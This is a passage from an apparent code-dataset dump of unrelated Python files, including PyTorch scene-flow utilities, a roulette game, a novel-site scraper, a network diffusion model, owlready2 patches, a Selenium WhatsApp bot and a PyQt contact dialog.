invert=False):\n \"\"\"Convert the network's (axisangle, translation) output into a 4x4 matrix\n from Monodepth2\n \"\"\"\n R = rot_from_axisangle(axisangle)\n t = translation.clone()\n\n if invert:\n R = R.transpose(1, 2)\n t *= -1\n\n T = get_translation_matrix(t)\n\n if invert:\n M = torch.matmul(R, T)\n else:\n M = torch.matmul(T, R)\n\n return M\n\ndef rot_from_axisangle(vec):\n \"\"\"Convert an axisangle rotation into a 4x4 transformation matrix\n (adapted from https://github.com/Wallacoloo/printipi)\n Input 'vec' has to be Bx1x3\n \"\"\"\n angle = torch.norm(vec, 2, 2, True)\n axis = vec / (angle + 1e-7)\n\n ca = torch.cos(angle)\n sa = torch.sin(angle)\n C = 1 - ca\n\n x = axis[..., 0].unsqueeze(1)\n y = axis[..., 1].unsqueeze(1)\n z = axis[..., 2].unsqueeze(1)\n\n xs = x * sa\n ys = y * sa\n zs = z * sa\n xC = x * C\n yC = y * C\n zC = z * C\n xyC = x * yC\n yzC = y * zC\n zxC = z * xC\n\n rot = torch.zeros((vec.shape[0], 4, 4)).to(device=vec.device)\n\n rot[:, 0, 0] = torch.squeeze(x * xC + ca)\n rot[:, 0, 1] = torch.squeeze(xyC - zs)\n rot[:, 0, 2] = torch.squeeze(zxC + ys)\n rot[:, 1, 0] = torch.squeeze(xyC + zs)\n rot[:, 1, 1] = torch.squeeze(y * yC + ca)\n rot[:, 1, 2] = torch.squeeze(yzC - xs)\n rot[:, 2, 0] = torch.squeeze(zxC - ys)\n rot[:, 2, 1] = torch.squeeze(yzC + xs)\n rot[:, 2, 2] = torch.squeeze(z * zC + ca)\n rot[:, 3, 3] = 1\n\n return rot\n\n\ndef get_translation_matrix(translation_vector):\n \"\"\"Convert a translation vector into a 4x4 transformation matrix\n \"\"\"\n T = torch.zeros(translation_vector.shape[0], 4, 4).to(device=translation_vector.device)\n\n t = translation_vector.contiguous().view(-1, 3, 1)\n\n T[:, 0, 0] = 1\n T[:, 1, 1] = 1\n T[:, 2, 2] = 1\n T[:, 3, 3] = 1\n T[:, :3, 3, None] = t\n\n return T\n\n\ndef uvd2xyz(flow_uvd, disp, k1, input_size):\n \"\"\"flow_uvd: 3 channel grid of du, dv, ddisp\"\"\"\n ### uv1_grid, xy1_grid, xyz_0\n\n _, _, h_x, w_x = flow_uvd.size()\n local_scale = torch.zeros_like(input_size)\n local_scale[:, 0] = h_x\n local_scale[:, 1] = w_x\n\n disp = interpolate2d_as(disp, flow_uvd) * w_x\n pts1, k1_scale, uv1_grid = pixel2pts_ms_and_uv1grid(k1, disp, local_scale / input_size)\n\n ### uv1_grid_flowed\n flow_uvd_pixel = flow_uvd * w_x\n flow_uv_pixel = flow_uvd_pixel[:, :2]\n uv_grid_flowed = uv1_grid[:, :2] + flow_uv_pixel\n uv1_grid_flowed = torch.cat([uv_grid_flowed, uv1_grid[:, [2]]], dim=1) # B*3*H*W\n \n ### xy1_grid_flowed\n disp_change = flow_uvd_pixel[:, [2]]\n disp_changed = disp + disp_change\n disp_changed = torch.clamp(disp_changed, min=1e-7)\n depth_changed = disp2depth_kitti(disp_changed, k1_scale[:, 0, 0])\n\n ### xyz_1\n depth_mat = depth_changed.flatten(2)\n pixel_mat = uv1_grid_flowed.flatten(2)\n pts_mat = torch.matmul(torch.inverse(k1_scale.cpu()).cuda(), pixel_mat) * depth_mat\n pts2 = pts_mat.reshape_as(uv1_grid_flowed)\n\n ### xyz_flow\n xyz_flow = pts2 - pts1\n\n return xyz_flow\n\ndef xyz2uvd(flow_xyz, disp, k1, input_size):\n\n _, _, h_x, w_x = flow_xyz.size()\n local_scale = torch.zeros_like(input_size)\n local_scale[:, 0] = h_x\n local_scale[:, 1] = w_x\n\n disp = interpolate2d_as(disp, flow_xyz) * w_x\n pts1, k1_scale, uv1_grid = pixel2pts_ms_and_uv1grid(k1, disp, local_scale / input_size)\n pts2 = pts1 + flow_xyz\n\n uvz2 = torch.matmul(k1_scale, pts2.flatten(2)).reshape_as(pts2)\n uv2 = uvz2[:, :2] / torch.clamp(uvz2[:, [2]], min=1e-3)\n ### or \n # uv2 = pts2pixel(pts2, k1_scale)\n\n uv_flow = uv2 - uv1_grid[:, :2]\n\n depth2 = torch.clamp(pts2[:, [2]], min=1e-3)\n disp2 = depth2disp_kitti(depth2, k1_scale[:, 0, 0])\n\n d_flow = disp2 - disp\n\n uvd_flow_pixel = torch.cat([uv_flow, d_flow], dim=1)\n uvd_flow_normalized = uvd_flow_pixel / w_x\n\n return uvd_flow_normalized\n","sub_path":"models/modules_sceneflow.py","file_name":"modules_sceneflow.py","file_ext":"py","file_size_in_byte":23360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"205557506","text":"import random \n\nsaldo = 100\n\n\nwhile saldo > 0:\n print (saldo)\n aposta = float(input('Quanto você aposta?'))\n resp = input('A aposta é um número ou paridade?')\n \n if aposta == 0:\n break\n \n if resp == 'n':\n num = int(input('Digite o número'))\n if num == random.randint(0,36):\n saldo += aposta*num\n else:\n saldo -= aposta\n \n if resp == 'p':\n num = random.randint(0,36)\n p_i = input('O número é par ou impar?')\n if random.randint(0,36) % 2 == 0:\n resposta = 'p' \n else:\n resposta = 'i'\n if p_i == resposta:\n saldo += aposta\n else:\n saldo -= aposta\n \n ","sub_path":"backup/user_382/ch120_2020_03_30_20_04_15_503064.py","file_name":"ch120_2020_03_30_20_04_15_503064.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"542461155","text":"import requests\r\nfrom lxml import html\r\nimport os\r\netree=html.etree\r\nheaders={ \"User-Agent\":\"Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36\"}\r\nurl=\"http://www.jinyongwang.com/book/\"\r\nres=requests.get(url,headers=headers)\r\nresult=res.content.decode(\"utf8\")\r\nhtml_result=etree.HTML(result)\r\nh2s=html_result.xpath(\"//h2[@class='bookname']/span[contains(text(),'修订版')]\")[0]\r\nul=h2s.xpath(\"../following-sibling::ul[1]/li\")\r\nfor li in ul:\r\n p_title=li.xpath(\"./p[@class='title']/a/text()\")[0]\r\n p_href=li.xpath(\"./p[@class='title']/a/@href\")[0]\r\n os.makedirs(\"./book/\"+str(p_title))\r\n url2=\"http://www.jinyongwang.com\"+p_href\r\n print(url2)\r\n res2=requests.get(url2,headers=headers)\r\n result2=res2.content.decode(\"utf8\")\r\n html_result2=etree.HTML(result2)\r\n lis=html_result2.xpath(\"//ul[@class='mlist']/li\")\r\n for li_text in lis:\r\n sub_title=li_text.xpath(\"./a/text()\")[0]\r\n print(sub_title)\r\n sub_href=li_text.xpath(\"./a/@href\")[0]\r\n print(\"http://www.jinyongwang.com\"+sub_href)\r\n res3=requests.get(\"http://www.jinyongwang.com\"+sub_href,headers=headers)\r\n result3=res3.content.decode(\"utf8\")\r\n with open(\"test.html\",\"w\",encoding=\"utf8\") as f:\r\n f.write(result3)\r\n html_result3=etree.HTML(result3)\r\n result_content=html_result3.xpath(\"//div[@class='vcon']\")[0]\r\n print(result_content)\r\n ps=result_content.xpath(\"./p/text()\")\r\n str_content=\"\"\r\n for p1 in ps:\r\n str_content+=p1+\"\\n\"\r\n with open(\"book/\"+str(p_title)+\"/\"+str(sub_title)+\".txt\",\"w\",encoding=\"utf8\") as f:\r\n f.write(str_content)\r\n\r\n #hrefs=li.xpath(\"//p[@class='title']/a/@href\")\r\n #print(hrefs)","sub_path":"tst_jin.py","file_name":"tst_jin.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"96472969","text":"from ..DiffusionModel import DiffusionModel\nimport networkx as nx\nimport numpy as np\nfrom scipy import stats\n\n__author__ = \"Letizia Milli\"\n__email__ = \"letizia.milli@di.unipi.it\"\n\n\nclass KerteszThresholdModel(DiffusionModel):\n \"\"\"\n Implements the blocked-nodes threshold model by Karsai et al.\n Model Parameters:\n (1) list of blocked nodes\n (2) exogenous adopter rate\n (3) node thresholds\n \"\"\"\n\n def __init__(self, graph):\n super(self.__class__, self).__init__(graph)\n self.available_statuses = {\n \"Susceptible\": 0,\n \"Infected\": 1,\n \"Blocked\": -1\n }\n\n self.parameters = {\n \"model\": {\n \"adopter_rate\": {\n \"descr\": \"Exogenous adoption rate\",\n \"range\": [0, 1],\n \"optional\": True,\n \"default\": 0\n },\n \"percentage_blocked\": {\n \"descr\": \"Percentage of blocked nodes\",\n \"range\": [0, 1],\n \"optional\": True,\n \"default\": 0.1\n }\n },\n \"nodes\": {\n \"threshold\": {\n \"descr\": \"Node threshold\",\n \"range\": [0, 1],\n \"optional\": True,\n \"default\": 0.1\n }\n },\n \"edges\": {},\n }\n\n self.name = \"Kertesz Threhold\"\n\n def iteration(self):\n \"\"\"\n\n \"\"\"\n self.clean_initial_status(self.available_statuses.values())\n actual_status = {node: nstatus for node, nstatus in self.status.iteritems()}\n\n if self.actual_iteration == 0:\n if min(actual_status.values()) == 0:\n number_node_blocked = int(float(self.graph.number_of_nodes()) *\n float(self.params['model']['percentage_blocked']))\n\n i = 0\n while i < number_node_blocked:\n # select a random node\n node = self.graph.nodes()[np.random.randint(0, self.graph.number_of_nodes())]\n\n # node not infected\n if actual_status[node] == 0:\n\n # node blocked\n actual_status[node] = -1\n self.status[node] = -1\n i += 1\n\n self.actual_iteration += 1\n return 0, actual_status\n\n for node in self.graph.nodes():\n if self.status[node] == 0:\n if self.params['model']['adopter_rate'] > 0:\n xk = (0, 1)\n pk = (1-self.params['model']['adopter_rate'], self.params['model']['adopter_rate'])\n probability = stats.rv_discrete(name='probability', values=(xk, pk))\n number_probability = probability.rvs()\n\n if number_probability == 1:\n actual_status[node] = 1\n continue\n\n neighbors = self.graph.neighbors(node)\n if len(neighbors) == 0:\n continue\n\n if isinstance(self.graph, nx.DiGraph):\n neighbors = self.graph.predecessors(node)\n\n infected = 0\n for v in neighbors:\n infected += self.status[v]\n\n infected_ratio = float(infected)/len(neighbors)\n if infected_ratio >= self.params['nodes']['threshold'][node]:\n actual_status[node] = 1\n\n delta = self.status_delta(actual_status)\n self.status = actual_status\n self.actual_iteration += 1\n\n return self.actual_iteration-1, delta\n","sub_path":"ndlib/models/epidemics/KerteszThresholdModel.py","file_name":"KerteszThresholdModel.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"461095986","text":"from __future__ import print_function\nimport sys\n\nfrom Ziggeo import Ziggeo\n\nif(len(sys.argv) < 4):\n print (\"Error\\n\")\n print (\"Usage: $>python webhooks_delete.py YOUR_API_TOKEN YOUR_PRIVATE_KEY WEBHOOK_URL \\n\")\n print (\"Example: $>python webhooks_delete.py 1234567890abcdef 1234567890abcdef http://yoursite.com \\n\")\n sys.exit()\n\napi_token = sys.argv[1]\nprivate_key = sys.argv[2]\ntarget_url = sys.argv[3]\n\nziggeo = Ziggeo(api_token, private_key)\n\narguments = {}\narguments['target_url'] = target_url\n\nziggeo.webhooks().delete(arguments)","sub_path":"demos/webhooks_delete.py","file_name":"webhooks_delete.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"316528602","text":"# -*- coding: utf-8 -*-\n\"\"\"This module injects some additional methods into owlready2 classes.\"\"\"\nimport types\n\nimport owlready2\nfrom owlready2 import ThingClass, PropertyClass, Thing, Restriction, Namespace\nfrom owlready2 import Metadata\n\n\n# Improve default rendering of entities\ndef render_func(entity):\n if hasattr(entity, 'prefLabel') and entity.prefLabel:\n name = entity.prefLabel[0]\n elif hasattr(entity, 'label') and entity.label:\n name = entity.label[0]\n elif hasattr(entity, 'altLabel') and entity.altLabel:\n name = entity.altLabel[0]\n else:\n name = entity.name\n return \"%s.%s\" % (entity.namespace.name, name)\n\n\nowlready2.set_render_func(render_func)\n\n\n#\n# Extending ThingClass (classes)\n# ==============================\ndef get_preferred_label(self):\n \"\"\"Returns the preferred label as a string (not list).\n\n The following heuristics is used:\n - if prefLabel annotation property exists, returns the first prefLabel\n - if label annotation property exists, returns the first label\n - otherwise return the name\n \"\"\"\n if hasattr(self, 'prefLabel') and self.prefLabel:\n return self.prefLabel[0]\n elif hasattr(self, 'label') and self.label:\n return self.label.first()\n else:\n return self.name\n\n\ndef get_parents(self, strict=False):\n \"\"\"Returns a list of all parents. If `strict` is true, parents that are\n parents of other parents are excluded.\"\"\"\n if strict:\n s = self.get_parents()\n for e in s.copy():\n s.difference_update(e.ancestors(include_self=False))\n return s\n elif isinstance(self, ThingClass):\n return {cls for cls in self.is_a\n if isinstance(cls, ThingClass)}\n elif isinstance(self, owlready2.ObjectPropertyClass):\n return {cls for cls in self.is_a\n if isinstance(cls, owlready2.ObjectPropertyClass)}\n else:\n assert 0\n\n\ndef _dir(self):\n \"\"\"Extend in dir() listing of ontology classes.\"\"\"\n s = set(object.__dir__(self))\n props = self.namespace.world._props.keys()\n s.update(props)\n return sorted(s)\n\n\ndef get_class_annotations(self, all=False, imported=True):\n \"\"\"Returns a dict with non-empty annotations.\n\n If `all` is true, also annotations with no value are included.\n\n If `imported` is true, also include annotations defined in\n imported ontologies.\n \"\"\"\n onto = self.namespace.ontology\n d = {get_preferred_label(a): a._get_values_for_class(self)\n for a in onto.annotation_properties(imported=imported)}\n if all:\n return d\n else:\n return {k: v for k, v in d.items() if v}\n\n\ndef disjoint_with(self, reduce=False):\n \"\"\"Returns a generator with all classes that are disjoint with `self`.\n If `reduce` is true, all classes that are a descendant of another class\n will be excluded.\"\"\"\n if reduce:\n s = set(self.disjoint_with())\n for e in s.copy():\n s.difference_update(e.descendants(include_self=False))\n for e in s:\n yield e\n else:\n for d in self.disjoints():\n for e in d.entities:\n if e is not self:\n yield e\n\n\ndef get_indirect_is_a(self, skip_classes=True):\n \"\"\"Returns the set of all isSubclassOf relations of self and its\n ancestors. If `skip_classes` is true, indirect classes are not\n included in the returned set.\n \"\"\"\n s = set()\n for e in reversed(self.mro()):\n if hasattr(e, 'is_a'):\n if skip_classes:\n s.update(r for r in e.is_a\n if not isinstance(r, owlready2.ThingClass))\n else:\n s.update(e.is_a)\n s.update(self.is_a)\n return s\n\n\n# Inject methods into ThingClass\nsetattr(ThingClass, '__dir__', _dir)\nsetattr(ThingClass, 'get_preferred_label', get_preferred_label)\nsetattr(ThingClass, 'get_parents', get_parents)\nsetattr(ThingClass, 'get_annotations', get_class_annotations)\nsetattr(ThingClass, 'disjoint_with', disjoint_with)\nsetattr(ThingClass, 'get_indirect_is_a', get_indirect_is_a)\n\n\n#\n# Extending PropertyClass (properties)\n# ====================================\ndef get_property_annotations(self, all=False, imported=True):\n \"\"\"Returns a dict with non-empty property annotations.\n\n If `all` is true, also annotations with no value are included.\n\n If `imported` is true, also include annotations defined in\n imported ontologies.\n \"\"\"\n onto = self.namespace.ontology\n d = {get_preferred_label(a): a._get_values_for_class(self)\n for a in onto.annotation_properties(imported=imported)}\n if all:\n return d\n else:\n return {k: v for k, v in d.items() if v}\n\n\nsetattr(PropertyClass, 'get_preferred_label', get_preferred_label)\nsetattr(PropertyClass, 'get_parents', get_parents)\nsetattr(PropertyClass, 'get_annotations', get_property_annotations)\n\n\n#\n# Extending Thing (individuals)\n# =============================\ndef get_individual_annotations(self, all=False, imported=True):\n \"\"\"Returns a dict with non-empty individual annotations.\n\n If `all` is true, also annotations with no value are included.\n\n If `imported` is true, also include annotations defined in\n imported ontologies.\n \"\"\"\n onto = self.namespace.ontology\n d = {get_preferred_label(a): a._get_values_for_individual(self)\n for a in onto.annotation_properties(imported=imported)}\n if all:\n return d\n else:\n return {k: v for k, v in d.items() if v}\n\n\n# Method names for individuals must be different from method names for classes\ntype.__setattr__(Thing, 'get_preflabel', get_preferred_label)\ntype.__setattr__(Thing, 'get_individual_annotations',\n get_individual_annotations)\n\n\n#\n# Extending Restriction\n# =====================\ndef get_typename(self):\n return owlready2.class_construct._restriction_type_2_label[self.type]\n\n\nsetattr(Restriction, 'get_typename', get_typename)\n\n\n#\n# Extending Namespace\n# ===================\norig_namespace_init = Namespace.__init__\n\n\ndef namespace_init(self, world_or_ontology, base_iri, name=None):\n orig_namespace_init(self, world_or_ontology, base_iri, name)\n if self.name.endswith('.ttl'):\n self.name = self.name[:-4]\n\n\nsetattr(Namespace, '__init__', namespace_init)\n\n\n#\n# Extending Metadata\n# ==================\ndef keys(self):\n \"\"\"Return a generator over annotation property names associates\n with this ontology.\"\"\"\n ns = self.namespace\n for a in ns.annotation_properties():\n if ns._has_data_triple_spod(s=ns.storid, p=a.storid):\n yield a\n\n\ndef items(self):\n \"\"\"Return a generator over annotation property (name, value_list)\n pairs associates with this ontology.\"\"\"\n ns = self.namespace\n for a in ns.annotation_properties():\n if ns._has_data_triple_spod(s=ns.storid, p=a.storid):\n yield a, self.__getattr__(a.name)\n\n\ndef has(self, name):\n \"\"\"Returns true if `name`\"\"\"\n return name in set(self.keys())\n\n\ndef __contains__(self, name):\n return self.has(name)\n\n\ndef __iter__(self):\n return self.keys()\n\n\ndef __setattr__(self, attr, values):\n metadata__setattr__save(self, attr, values)\n # Make sure that __setattr__() also updates the triplestore\n lst = self.__dict__[attr]\n if lst:\n ns = self.namespace\n annot = {\n a.name: a for a in owlready2.AnnotationProperty.__subclasses__()}\n if attr in annot:\n prop = annot[attr]\n else:\n with ns.ontology:\n prop = types.new_class(attr, (owlready2.AnnotationProperty, ))\n o, d = owlready2.to_literal(lst[0])\n ns._set_data_triple_spod(ns.storid, prop.storid, o, d)\n for e in lst[1:]:\n o, d = owlready2.to_literal(e)\n ns._set_data_triple_spod(ns.storid, prop.storid, o, d)\n\n\ndef __repr__(self):\n s = ['Metadata(']\n for a, values in self.items():\n sep = '\\n' + ' ' * (len(a.name) + 4)\n s.append(' %s=[%s],' % (a.name, sep.join(repr(v) for v in values)))\n s.append(')')\n return '\\n'.join(s)\n\n\nmetadata__setattr__save = Metadata.__setattr__\nsetattr(Metadata, 'keys', keys)\nsetattr(Metadata, 'items', items)\nsetattr(Metadata, 'has', has)\nsetattr(Metadata, '__contains__', __contains__)\nsetattr(Metadata, '__iter__', __iter__)\nsetattr(Metadata, '__setattr__', __setattr__)\nsetattr(Metadata, '__repr__', __repr__)\nMetadata.__getitem__ = Metadata.__getattr__\nMetadata.__setitem__ = Metadata.__setattr__\n","sub_path":"emmo/patch.py","file_name":"patch.py","file_ext":"py","file_size_in_byte":8496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"287461841","text":"'''\nYou left your computer unlocked and your friend decided to troll you by copying a lot of your files to random spots all over your file system.\nEven worse, she saved the duplicate files with random, embarrassing names (\"this_is_like_a_digital_wedgie.txt\" was clever, I'll give her that).\n\nWrite a function that returns a list of all the duplicate files. \nWe'll check them by hand before actually deleting them, since programmatically deleting files is really scary. \nTo help us confirm that two files are actually duplicates, return a list of tuples where:\n\n- the first item is the duplicate file\n- the second item is the original file\n\nFor example:\n\n [('/tmp/parker_is_dumb.mpg', '/home/parker/secret_puppy_dance.mpg'),\n ('/home/trololol.mov', '/etc/apache2/httpd.conf')]\n\nYou can assume each file was only duplicated once.\n'''\n\nimport os\n\ndef list_duplicate_files():\n '''\n returns a list of tuples where the first entry is the duplicate file\n and the second entry is the original\n '''\n return \n\n\n# http://stackoverflow.com/questions/2212643/python-recursive-folder-read\n# os.path.join(mypath, f)\n# https://www.interviewcake.com/question/python/find-duplicate-files\ndef list_all_files(path, results):\n\n if os.path.isdir(path):\n files = os.listdir(path)\n\n for f in files:\n full_path = os.path.join(path, f)\n if os.path.isdir(full_path):\n list_all_files(full_path, results)\n\n elif os.path.isfile(full_path):\n results[full_path] += 1\n elif os.path.isfile(path):\n results[path] += 1\n return results\n\nfrom collections import defaultdict\nA = defaultdict(int)\nresults = list_all_files('/Users/bcutrell/kata', A)\nprint(results)\n \n\n\n","sub_path":"cake/find_duplicate_files.py","file_name":"find_duplicate_files.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"391993972","text":"from selenium import webdriver\nimport os\nfrom time import sleep\n\n\nclass zapbot:\n # O local de execução do nosso script\n dir_path = os.getcwd()\n # O caminho do chromedriver\n chromedriver = os.path.join(dir_path, \"chromedriver.exe\")\n # Caminho onde será criada pasta profile\n profile = os.path.join(dir_path, \"profile\", \"wpp\")\n\n def __init__(self):\n self.options = webdriver.ChromeOptions()\n # Configurando a pasta profile, para mantermos os dados da seção\n self.options.add_argument(\n r\"user-data-dir={}\".format(self.profile))\n # Inicializa o webdriver\n self.driver = webdriver.Chrome(\n self.chromedriver, chrome_options=self.options)\n # Abre o whatsappweb\n self.driver.get(\"https://web.whatsapp.com/\")\n # Aguarda alguns segundos para validação manual do QrCode\n self.driver.implicitly_wait(15)\n\n def ultima_msg(self):\n \"\"\" Captura a ultima mensagem da conversa \"\"\"\n try:\n post = self.driver.find_elements_by_class_name(\"_3_7SH\")\n ultimo = len(post) - 1\n # O texto da ultima mensagem\n texto = post[ultimo].find_element_by_css_selector(\n \"span.selectable-text\").text\n return texto\n except Exception as e:\n print(\"Erro ao ler msg, tentando novamente!\")\n\n def envia_msg(self, msg):\n \"\"\" Envia uma mensagem para a conversa aberta \"\"\"\n try:\n sleep(2)\n # Seleciona acaixa de mensagem\n self.caixa_de_mensagem = self.driver.find_element_by_class_name(\"_2S1VP\")\n # Digita a mensagem\n self.caixa_de_mensagem.send_keys(msg)\n sleep(1)\n # Seleciona botão enviar\n self.botao_enviar = self.driver.find_element_by_class_name(\"_35EW6\")\n # Envia msg\n self.botao_enviar.click()\n sleep(2)\n except Exception as e:\n print(\"Erro ao enviar msg\", e)\n\n def envia_media(self, fileToSend):\n \"\"\" Envia media \"\"\"\n try:\n # Clica no botão adicionar\n self.driver.find_element_by_css_selector(\"span[data-icon='clip']\").click()\n # Seleciona input\n attach = self.driver.find_element_by_css_selector(\"input[type='file']\")\n # Adiciona arquivo\n attach.send_keys(fileToSend)\n sleep(3)\n # Seleciona botão enviar\n send = self.driver.find_element_by_xpath(\"//div[contains(@class, 'yavlE')]\")\n # Clica no botão enviar\n send.click()\n except Exception as e:\n print(\"Erro ao enviar media\", e)\n\n def abre_conversa(self, contato):\n \"\"\" Abre a conversa com um contato especifico \"\"\"\n try:\n # Seleciona a caixa de pesquisa de conversa\n self.caixa_de_pesquisa = self.driver.find_element_by_class_name(\"jN-F5\")\n # Digita o nome ou numero do contato\n self.caixa_de_pesquisa.send_keys(contato)\n sleep(2)\n # Seleciona o contato\n self.contato = self.driver.find_element_by_xpath(\"//span[@title = '{}']\".format(contato))\n # Entra na conversa\n self.contato.click()\n except Exception as e:\n raise e\n\n\nbot = zapbot()\nbot.abre_conversa(\"+55 11 99999-9999\")\nbot.envia_msg(\"Olá, sou o bot whatsapp! Para receber ajuda digite: /help\")\nimagem = bot.dir_path + \"/imagem.jpg\"\nmsg = \"\"\nwhile msg != \"/quit\":\n sleep(1)\n msg = bot.ultima_msg()\n if msg == \"/help\":\n bot.envia_msg(\"\"\"Bot: Esse é um texto com os comandos válidos:\n /help (para ajuda)\n /mais (para saber mais)\n /quit (para sair)\n \"\"\")\n elif msg == \"/mais\":\n bot.envia_media(imagem)\n elif msg == \"/quit\":\n bot.envia_msg(\"Bye bye!\")\n","sub_path":"whats_bot.py","file_name":"whats_bot.py","file_ext":"py","file_size_in_byte":3873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"475873859","text":"#!/usr/bin/env python\n\nimport fcntl\nimport os\nimport sys\nimport termios\n\nimport trollius\nfrom trollius import From\n\n\ndef keybindings(ch):\n return {\n }.get(ch, lambda: None)\n\n\ndef process_keys():\n key = sys.stdin.read(1)\n print(\"{} pressed\".format(key))\n if key == 'Q':\n loop.stop()\n\nfd = sys.stdin.fileno()\noldterm = termios.tcgetattr(fd)\nnewattr = termios.tcgetattr(fd)\nnewattr[3] = newattr[3] & ~termios.ICANON & ~termios.ECHO\ntermios.tcsetattr(fd, termios.TCSANOW, newattr)\noldflags = fcntl.fcntl(fd, fcntl.F_GETFL)\nfcntl.fcntl(fd, fcntl.F_SETFL, oldflags | os.O_NONBLOCK)\n\n\nloop = trollius.get_event_loop()\n\nloop.add_reader(fd, process_keys)\n\nloop.run_forever()\n\ntermios.tcsetattr(fd, termios.TCSAFLUSH, oldterm)\nfcntl.fcntl(fd, fcntl.F_SETFL, oldflags)\n","sub_path":"gazebo/tests/control/test_keyboard.py","file_name":"test_keyboard.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"543733963","text":"from PyQt5.QtGui import QStandardItemModel, QStandardItem\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QDialog, QLabel, QComboBox, QPushButton\nimport logging\n\nlogger = logging.getLogger('client')\n\n\nclass AddContactDialog(QDialog):\n \"\"\"\n Диалог добавления пользователя в список контактов.\n Предлагает пользователю список возможных контактов и\n добавляет выбранный в контакты.\n \"\"\"\n\n def __init__(self, transport, database):\n super().__init__()\n self.transport = transport\n self.database = database\n\n self.setFixedSize(350, 120)\n self.setWindowTitle('Выберите контакт для добавления:')\n self.setAttribute(Qt.WA_DeleteOnClose)\n self.setModal(True)\n\n self.selector_label = QLabel('Выберите контакт для добавления:', self)\n self.selector_label.setFixedSize(200, 20)\n self.selector_label.move(10, 0)\n\n self.selector = QComboBox(self)\n self.selector.setFixedSize(200, 20)\n self.selector.move(10, 30)\n\n self.btn_refresh = QPushButton('Обновить список', self)\n self.btn_refresh.setFixedSize(120, 30)\n self.btn_refresh.move(60, 60)\n\n self.btn_ok = QPushButton('Добавить', self)\n self.btn_ok.setFixedSize(100, 30)\n self.btn_ok.move(230, 20)\n\n self.btn_cancel = QPushButton('Отмена', self)\n self.btn_cancel.setFixedSize(100, 30)\n self.btn_cancel.move(230, 60)\n self.btn_cancel.clicked.connect(self.close)\n\n self.setStyleSheet(\n \"\"\"\nQWidget\n{\n color: #b1b1b1;\n background-color: #323232;\n}\n\nQTreeView, QListView\n{\n background-color: silver;\n margin-left: 5px;\n}\n\nQWidget:item:hover\n{\n background-color: QLinearGradient( x1: 0, y1: 0, x2: 0, y2: 1, stop: 0 #ffa02f, stop: 1 #ca0619);\n color: #000000;\n}\n\nQWidget:item:selected\n{\n background-color: QLinearGradient( x1: 0, y1: 0, x2: 0, y2: 1, stop: 0 #ffa02f, stop: 1 #d7801a);\n}\nQComboBox\n{\n selection-background-color: #ffaa00;\n background-color: QLinearGradient( x1: 0, y1: 0, x2: 0, y2: 1, stop: 0 #565656, stop: 0.1 #525252, stop: 0.5 #4e4e4e, stop: 0.9 #4a4a4a, stop: 1 #464646);\n border-style: solid;\n border: 1px solid #1e1e1e;\n border-radius: 5;\n}\n\nQComboBox:hover,QPushButton:hover\n{\n border: 2px solid QLinearGradient( x1: 0, y1: 0, x2: 0, y2: 1, stop: 0 #ffa02f, stop: 1 #d7801a);\n}\n\n\nQComboBox:on\n{\n padding-top: 3px;\n padding-left: 4px;\n background-color: QLinearGradient( x1: 0, y1: 0, x2: 0, y2: 1, stop: 0 #2d2d2d, stop: 0.1 #2b2b2b, stop: 0.5 #292929, stop: 0.9 #282828, stop: 1 #252525);\n selection-background-color: #ffaa00;\n}\n\nQComboBox QAbstractItemView\n{\n border: 2px solid darkgray;\n selection-background-color: QLinearGradient( x1: 0, y1: 0, x2: 0, y2: 1, stop: 0 #ffa02f, stop: 1 #d7801a);\n}\n\nQComboBox::drop-down\n{\n subcontrol-origin: padding;\n subcontrol-position: top right;\n width: 15px;\n\n border-left-width: 0px;\n border-left-color: darkgray;\n border-left-style: solid; /* just a single line */\n border-top-right-radius: 3px; /* same radius as the QComboBox */\n border-bottom-right-radius: 3px;\n }\n\nQComboBox::down-arrow\n{\n image: url(:/dark_orange/img/down_arrow.png);\n}\n\nQPushButton\n{\n color: #b1b1b1;\n background-color: QLinearGradient( x1: 0, y1: 0, x2: 0, y2: 1, stop: 0 #565656, stop: 0.1 #525252, stop: 0.5 #4e4e4e, stop: 0.9 #4a4a4a, stop: 1 #464646);\n border-width: 1px;\n border-color: #1e1e1e;\n border-style: solid;\n border-radius: 6;\n padding: 3px;\n font-size: 12px;\n padding-left: 5px;\n padding-right: 5px;\n min-width: 40px;\n}\n\nQPushButton:pressed\n{\n background-color: QLinearGradient( x1: 0, y1: 0, x2: 0, y2: 1, stop: 0 #2d2d2d, stop: 0.1 #2b2b2b, stop: 0.5 #292929, stop: 0.9 #282828, stop: 1 #252525);\n}\n \"\"\"\n )\n\n # Заполняем список возможных контактов\n self.possible_contacts_update()\n # Назначаем действие на кнопку обновить\n self.btn_refresh.clicked.connect(self.update_possible_contacts)\n\n def possible_contacts_update(self):\n \"\"\"\n Метод заполнения списка возможных контактов.\n Создаёт список всех зарегистрированных пользователей\n за исключением уже добавленных в контакты и самого себя.\n \"\"\"\n self.selector.clear()\n # множества всех контактов и контактов клиента\n contacts_list = set(self.database.get_contacts())\n users_list = set(self.database.get_users())\n # Удалим сами себя из списка пользователей, чтобы нельзя было добавить самого себя\n users_list.remove(self.transport.username)\n # Добавляем список возможных контактов\n self.selector.addItems(users_list - contacts_list)\n\n def update_possible_contacts(self):\n \"\"\"\n Метод обновления списка возможных контактов. Запрашивает с сервера\n список известных пользователей и обновляет содержимое окна.\n \"\"\"\n try:\n self.transport.user_list_update()\n 